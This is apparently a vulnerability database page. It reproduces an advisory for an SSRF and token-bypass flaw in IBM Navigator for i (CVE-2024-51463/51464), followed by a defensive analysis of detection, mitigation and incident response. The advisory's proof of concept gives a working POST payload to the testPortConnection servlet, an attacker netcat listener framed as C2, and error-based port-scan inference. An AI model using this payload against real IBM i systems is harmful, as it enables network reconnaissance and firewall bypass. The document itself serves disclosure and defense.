IBMi Navigator 7.5 - Server Side Request Forgery (SSRF)

Exploit Author: hyp3rlinx Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Unknown Published Date: 2025-04-15 
# Author Title: John Page (aka hyp3rlinx)
# Author Website: hyp3rlinx.altervista.org
# Source:  https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt
# Vendor: www.ibm.com



[Vendor]
www.ibm.com

[Product]
Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i.
IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application.
This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser.


[Vulnerability Type]
Server Side Request Forgery (SSRF)

[CVE Reference]
CVE-2024-51463

[Security Issue]
IBM i is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system,
potentially leading to network enumeration or facilitating other attacks.

post auth server side request forgery on non managed nodes to external hosts on any TCP ports. There are two call vectors that can be abused here,
one is the "Test TLS connection" but it only allows connections to TCP port 9476.

However, there exists another servlet method called "testConnectPort" which an authenticated attacker can use to connect to any IP and PORT
outside of the LAN. This can be abused for port scans, information disclosure, exfil data., bypass firewall rules to attack non managed nodes
or connect to attacker controlled C2 infrastructure.

This SSRF relies on exploiting a HTTP servlet generated security token bypass CVE-2024-51464, where intercepted HTTP request MN tokens are
incremented or padded with zero. This attacker controlled MN token is now seen as valid and the HTTP 403 Forbidden restriction is bypassed.


[Exploit/POC]
1)  attacker payload

POST /Navigator/DispatcherServlet/serviceability/testPortConnection?system=10.1.1.4
{"hostname":"10.2.10.16", "port":445}

2) attackers c2 server

┌──(rootggKali)-[/usr/share]
└─# nc -llvp 445                                                       
listening on [any] 445 ...
connect to [10.2.10.16] from victimhost [10.1.1.4] 44569


For port scan we can infer if external host ports are open or closed using error responses.

Port is open:
Error 500: Connection reset

Port is closed
Error 500: A remote host refused an attempted connect 


[References]
ADV0142856
https://www.ibm.com/support/pages/node/7179509

[Affected versions]
7.5.0,7.4.0, 7.3.0


[Network Access]
Remote


[Severity]
Medium
CVSS Base score:  5.4

Vendor Notification:  10/14/2024
Vendor fix and publication: 12/20/2024
12/27/2024 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


IBM Navigator for i — SSRF (CVE-2024-51463) and HTTP Token Bypass (CVE-2024-51464): Analysis, Impact, and Mitigation

IBM Navigator for i is a web-console included with IBM i that provides administration capabilities via a browser. In late 2024 several related issues affecting Navigator for i were disclosed that enable server‑side request forgery (SSRF) when combined with a token validation bypass. These issues affect multiple released versions of Navigator for i and can be used by an authenticated attacker to make the IBM i host initiate network connections on their behalf.

Executive summary

  • Vulnerabilities: CVE-2024-51463 (SSRF) and CVE-2024-51464 (HTTP security token bypass)
  • Affected versions: Navigator for i 7.3.x, 7.4.x, 7.5.x (per vendor advisory)
  • Severity: Medium (vendor CVSS base ~5.4); exploitation requires authentication in many cases, but the resulting SSRF can be leveraged for internal reconnaissance or reachability to external services
  • Vendor advisory: IBM ADV0142856 & related support pages — apply vendor-supplied updates and mitigations

What is SSRF and why it matters here

Server‑Side Request Forgery (SSRF) occurs when a vulnerable server can be coerced into making arbitrary network requests supplied by an attacker. SSRF is dangerous because a compromised server typically has more internal network access than an external attacker, and it can be used to:

  • Scan internal hosts and ports that are not exposed externally
  • Reach services protected by internal firewalls or ACLs
  • Pivot to management interfaces, metadata services, or other sensitive endpoints
  • Stage or facilitate data exfiltration or command-and-control (C2) communications

How the Navigator issues combine to create SSRF risk

The issues disclosed in late 2024 are complementary: one issue permits an attacker to bypass an HTTP servlet security token check, and the other exposes functionality that triggers outbound connections (a serviceability/test connection function). In practice:

  • The token validation bypass allows an attacker to circumvent an intended authentication/authorization barrier for certain servlet endpoints.
  • Once that barrier is bypassed, the serviceability functions that accept a hostname/IP and port may be used to make the IBM i host open network connections to attacker-specified destinations and ports.

Because these features allow specifying arbitrary remote hosts and TCP ports, they can be abused for port scanning, reachability checks, and other reconnaissance or follow-on attacks when properly chained with the token bypass.

Realistic impact and abuse cases

  • Internal reconnaissance: an attacker (with valid Navigator credentials or via token bypass) can probe internal services and management interfaces that are not accessible externally.
  • Firewall/segmentation bypass: the IBM i host can be used as a proxy to contact otherwise-protected destinations.
  • Information disclosure and pivoting: a successful SSRF may reveal service fingerprints or allow access to internal-only APIs, increasing the risk of subsequent compromise.
  • Command & control facilitation: persistent or periodic outbound connections could be used to contact attacker-controlled infrastructure if additional control is achieved.

Detection and threat hunting (defender guidance)

Focus detection on anomalous serviceability/test-connection activity, unusual outbound connections from IBM i systems, and token-related authentication anomalies. Suggested indicators and log sources:

  • Web server access logs for Navigator for i showing requests to serviceability/test functions originating from unusual accounts or IPs.
  • Outbound connection logs or netflow showing IBM i initiating connections to many distinct external IPs or to uncommon ports.
  • Application or webserver error logs showing recurring connection errors or resets associated with the web application.
  • Authentication and token validation errors or unusual token formats in the web application logs around the time of suspicious requests.

When investigating, correlate web access logs to network logs (firewall, proxy, netflow) and system logs on the IBM i host to determine whether outbound connections were initiated and what responses were observed.

Mitigation and remediation

Prioritize patching and apply the vendor-supplied updates. In addition to applying the official fixes, implement these compensating controls until patches are deployed and validated:

  • Apply security updates from IBM as recommended in the advisory (ADV0142856 / vendor support pages).
  • Restrict access to the Navigator for i web interface to trusted management networks via network ACLs, firewall rules, or VPNs.
  • Harden egress filtering — block or tightly restrict outbound connections from management hosts to the public internet and to arbitrary ports.
  • Disable or restrict serviceability/test features if they are not required in your environment, or place them behind an additional access control layer.
  • Enforce strong authentication (unique admin accounts, least privilege, MFA where possible) and monitor administrative access.
  • Restart affected services after patching and rotate any secrets or tokens if advised by the vendor.

Incident response steps

  • Isolate affected systems if you suspect active exploitation to prevent further outbound connections and lateral movement.
  • Collect and preserve relevant logs: web access logs, application logs, system audit logs, and network logs covering the suspected time window.
  • Search for signs of data exfiltration, abnormal processes, or persistence mechanisms on the IBM i host.
  • After containment, apply vendor fixes, reconfigure network controls, and restore services following your change-control and validation procedures.
  • Consider a password and credential rotation for administrative accounts that may have been exposed or used during the incident.

Safe validation and testing

If you need to validate that your environment is no longer vulnerable, perform tests only in an isolated lab or maintenance window and follow safe-testing practices:

  • Operate in an isolated network segment with no production data or access to critical internal services.
  • Use vendor guidance and test cases that verify whether the fixed behavior is present, avoiding arbitrary outbound tests to public systems.
  • Coordinate with IBM support for recommended validation steps or tools if available.

References and vendor resources

Resource Notes
IBM support — Navigator for i advisory (ADV0142856) Official vendor advisory and patch information; primary remediation source.
Vulnerability identifiers CVE-2024-51463 (SSRF) and CVE-2024-51464 (HTTP token bypass)

Key takeaways

  • Apply IBM’s security updates promptly — this is the definitive remediation path.
  • Restrict access to Navigator for i to trusted management networks and implement egress filtering to reduce SSRF impact.
  • Hunt for anomalous web activity and outbound connections from IBM i hosts, and treat serviceability/test features as high-value attack surfaces.
  • When in doubt, engage IBM support for guidance tailored to your environment and for validation after patching.